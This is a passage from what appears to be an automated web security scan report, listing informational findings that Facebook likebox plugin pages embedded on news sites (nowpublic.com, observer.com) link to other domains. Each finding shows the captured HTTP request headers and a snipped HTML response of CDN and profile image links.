<a href="http://www.facebook.com/profile.php?id=670327677" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275820_670327677_1283854559_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/olatunbosun.jegede" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274707_1022928586_2474270_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1529403362" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23254_1529403362_4817_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002760544146" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275693_100002760544146_8386355_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.50. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.137.46
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:39 GMT
Content-Length: 12925

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/NowPublic/107566832624397" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/174680_107566832624397_6901406_q.jpg" alt="NowPublic" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001572506264" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260953_100001572506264_1840044396_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hamdard84" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186909_100001557237535_5201328_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000398385421" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274063_100000398385421_2042837218_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002412406198" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275105_100002412406198_2586465_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000754023240" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
11.51. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.48
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:35 GMT
Content-Length: 12828

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/NowPublic/107566832624397" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/174680_107566832624397_6901406_q.jpg" alt="NowPublic" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002874815552" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275843_100002874815552_3370960_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hamdard84" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186909_100001557237535_5201328_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000754023240" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Mureedbizenjo" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174496_661700762_292052_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275937_683674778_595354284_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.52. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.12.35
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:17 GMT
Content-Length: 13173

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273359_26311129_904709769_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/261029_1193179193_1591267711_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274170_100000159617387_7658664_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rsarja" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41641_1069590167_8489_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174518_1531397409_2783989_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275054_1053268063_4076276_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.53. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.21.37
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:23 GMT
Content-Length: 12833

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/NowPublic/107566832624397" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/174680_107566832624397_6901406_q.jpg" alt="NowPublic" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hamdard84" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186909_100001557237535_5201328_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001572506264" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260953_100001572506264_1840044396_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1054856459" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/161422_1054856459_6083028_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Mureedbizenjo" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174496_661700762_292052_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275937_683674778_595354284_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.54. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.37.115
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:16 GMT
Content-Length: 12854

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/NowPublic/107566832624397" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/174680_107566832624397_6901406_q.jpg" alt="NowPublic" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hamdard84" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186909_100001557237535_5201328_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002874815552" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275843_100002874815552_3370960_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002412406198" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275105_100002412406198_2586465_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275937_683674778_595354284_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000754023240" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
11.55. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.140.49
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:28 GMT
Content-Length: 13255

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174518_1531397409_2783989_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275054_1053268063_4076276_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274170_100000159617387_7658664_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pacokiuoficial" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275029_623408303_7363567_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273359_26311129_904709769_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000748617778" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275828_100000748617778_4321253_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.56. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.180.37
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:25 GMT
Content-Length: 13240

